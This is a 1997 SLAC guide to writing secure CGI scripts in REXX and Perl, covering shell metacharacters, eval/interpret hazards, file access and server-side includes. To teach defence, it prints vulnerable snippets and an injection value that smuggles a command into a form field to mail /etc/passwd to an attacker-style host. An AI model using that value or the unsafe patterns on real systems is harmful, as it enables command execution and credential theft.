Writing More Secure CGI Scripts

Last Update: December 2, 1997 Translated into: German ¹ Ukrainian ² Danish ³ Czech ⁴

Any time that a program such as a WWW server is interacting with a networked client such as a WWW browser, there is the possibility of that client attacking the program to gain unauthorized access. Even the most innocent looking script can be very dangerous to the integrity of your system.

With that in mind, I would like to present a few guidelines to help ensure your program does not come under attack. This presentation uses examples from REXX and Perl, however, the principles apply to most languages.

You may also want to look at Paul Phillips' CGI Security for information on Perl, C and C++. Another source of information is Lincoln Stein's well-regarded WWW Security FAQ If you are using Perl then you should also consider using Perl's taint checking mechanism. If you are writing scripts for a Windows NT server then see Somarsoft - Windows NT Security Issues. NEW

Beware the Interpret statement
Languages like REXX, the Bourne shell and Perl provide an Interpret command or equivalent (e.g. eval in the Bourne shell) which allow you to construct a string and have the interpreter execute that string. This can be very dangerous. For example, observe the following statements in a REXX script:
INTERPRET TRANSLATE(GETENV('QUERY_STRING'),' ','+') or
ADDESS UNIX TRANSLATE(GETENV('QUERY_STRING'),' ','+'))
These clever little snippets take the query string, and convert it into a command to be executed by the Web server. Unfortunately, the user could very easily have put a command to delete all the files in the query string or to mail a copy of the password file to someone. So I must restrict what command(s) the system is allowed to execute in response to the input.
If a set of commands needs to be executed you may wish to set up a table containing the acceptable commands, see below for more on this.
Do not trust the client to do anything
A well-behaved client will escape any characters which have special meaning to the Bourne shell in a query string. For example it may replace special characters such as a semicolon (;) or a greater-than sign (>) with "%XX" where XX is the ASCII code for the character in hexadecimal. This helps to avoid problems with your script misinterpreting the characters when they are used to construct the arguments of a command to be executed (for example, via the REXX ADDRESS UNIX command or the Perl system() command) in the server's environment (for example the Bourne shell in Unix).
A mischevious client may use special characters to confuse your script and gain unauthorized access. For example the following line may be present in a form-mail program:
system("/usr/lib/sendmail -t $form_address < $input_file");
The problem is that system starts a subshell; however, there is no guarantee that the $form_address variable cannot be maniplulated by a mischevious client. Consider the following value for $form_address:
"legit-id@good.box.com;mail wily-cracker@evil.box.com < /etc/passwd"
In this case the wily-cracker has used the semicolon to append a command to mail to herself the system's password file.
The CGI script should therefore be careful to accept only the subset of characters which will not confuse your script. A reasonable subset is [0-9] [a-z] [A-Z] -_./@ Any other characters should be treated with care and be rejected in general. The same goes for escaped characters after they have been converted. You may wish review the following REXX code fragments, or for C and Perl review How to Remove Meta-characters from User-Supplied Data in CGI Scripts, to see how to verify that a string contains only acceptable characters.
Be careful with popen, system, ADDRESS UNIX etc.
The general rule is that you should not fork a subshell if the CGI script is passing untrusted data to it. In Perl you can fork subshells with the system command, commands with backticks (for example `program $args`;), the exec statement (for example exec("program $args");), and by opening a pipe (for example open(OUT, "|program $prog-args");). In REXX the usual way to fork a subshell is to use the ADDRESS UNIX or POPEN commands. So you must not pass untrusted data to the shell and in programs that run externally with arguments, check the arguments to ensure they do not contain metacharacters.
It appears to be possible to avoid UNIX Bourne shell metacharacter expansions (such as piping (|), commands in backticks (`), redirection (>, >>, <, etc.), multiple commands (;), or filename expansions (using *, ?, [], etc.)) by placing the parameters for the UNIX command into environment variables. For example in Uni-REXX you could replace
ADDRESS UNIX 'finger' username
by
Fail=PUTENV("PARM1="username); ADDRESS UNIX 'finger "$PARM1"'
Note that we have not exhaustively tested this on multiple platforms, and there may be some hacks that will defeat this protection.
Some versions of REXX (including Uni-REXX) also allow you to avoid shell expansions by using
ADDRESS COMMAND 'finger' username
instead of
ADDRESS UNIX 'finger' username.
If ADDRESS COMMAND is available and avoids the shell expansion, then it should be used whenever possible, and should be made the default by placing an ADDRESS COMMAND statement near the beginning of the script.
If the above mechanisms are not available then be sure to place backslashes before any characters that have special meaning to the Bourne shell before calling the program. This can be achieved easily with a short C function. See the sample REXX and Perl code fragments for how to accomplish this.
It is good practice to allow execution of only a very limited set of commands by the CGI script. This set might be selected from a table of allowed commands. See the REXX example for how this might be accomplished. This mechanism is utilized in SLAC's CGI Security Wrapper.
Turn off server-side includes
If your server is unfortunate enough to support server-side includes, turn them off for your script directories!!!. The server-side includes can be abused by clients which prey on scripts which directly output things they have been sent.
Restrict Access to Files
Be careful to ensure that any file contents that you display are appropriate. For example, if the script receives a request from a form or a URL to display part or all of a particular file, the script should first verify (e.g. versus a list or the httpd configuration file) that this file is appropriate to make visible via WWW.
Avoid allowing the client to access files higher up the directory chain by blocking the use of .. in the filename.
Avoid the server misinterpreting a filename for options (which might result in the process hanging awaiting standard input since no filename is found) by checking that the filename does not start with a minus sign (-).
Restricting Distribution of Information
The IP address of the client is available to the CGI script in the environment variable REMOTE_ADDR. This may be used by the script to refuse the request if the client's IP address does not match some requirements.
Test the script before getting the WWW server to execute it
It is very easy for an untested script to cause the server problems. For example if, by mistake, the script asks for input from the console e.g. by executing a REXX PULL command with nothing on the stack, or by executing a REXX TRACE ?R command. This will cause the process on the server to stall. Or the script may go into an infinite loop, or continuously spawn new processes and use up all the server's process slots.
You may test the script in Unix without requiring it to be executed by the WWW server, by using the Unix setenv command to set the environment variables required, then call your script and pipe the output to a file. Then use your WWW browser to view the local file created by the pipe.
At SLAC we have also set up a test WWW server at http://www.slac.stanford.edu:5080/ which should be used for testing CGI scripts on before they are put on the production server.
Include a comment near the top of the script recommending that anyone modifying the script needs to be aware that CGI scripts have security risks and to first read this document (http://www.slac.stanford.edu/slac/www/resource/how-to-use/cgi-rexx/cgi-security.html).
Don't Expose the script unnecessarily
If possible set the access control to the script so it is executable by your WWW server, but not world readable. For example:
- do not save the script in your public_html or any part of your file space that is visible to the Web (e.g. at SLAC do not put it under /afs/slac/www/);
- if under AFS, then Access Control Lists (ACL) should restricted access to the maintainer(s) and the WWW server.
This will reduce the possibility of a cracker reviewing your script to discover vulnerabilities.
Also remember to delete any old/backup copies that may be created automatically by an editor such as emacs, and which may still be visible and executable by the server. One way to avoid the creation of backup copies in the directory that the server will execute from, is to keep and edit the actual script in another directory and place a symbolic link to the script in the directory the server will execute the script from.
Beware of World Writeable Files
Some scripts require reading and updating a file (e.g. to keep track of the number of times the script was called). If this file is world writeable, then care must be taken before using the results in the file, to ensure the contents of the file have not been corrupted maliciously.

[ CGI overview | Writing CGI Scripts | SLAC's CGI Wrapper | Feedback ]

¹ Translated into German by Fijavan Brenk
² Translated into Ukrainian by Oksana Mikhailuk, hosted by www.everycloudtech.com
³ Translated into Danish by Mille Eriksen.
⁴ Translated into Czech by Barbora Lebedova

This page evolved from information from Rob McCool robm@ncsa.uiuc.edu. Also I have gained many insights and useful information from John Halperin@slac.stanford.edu.

Les Cottrell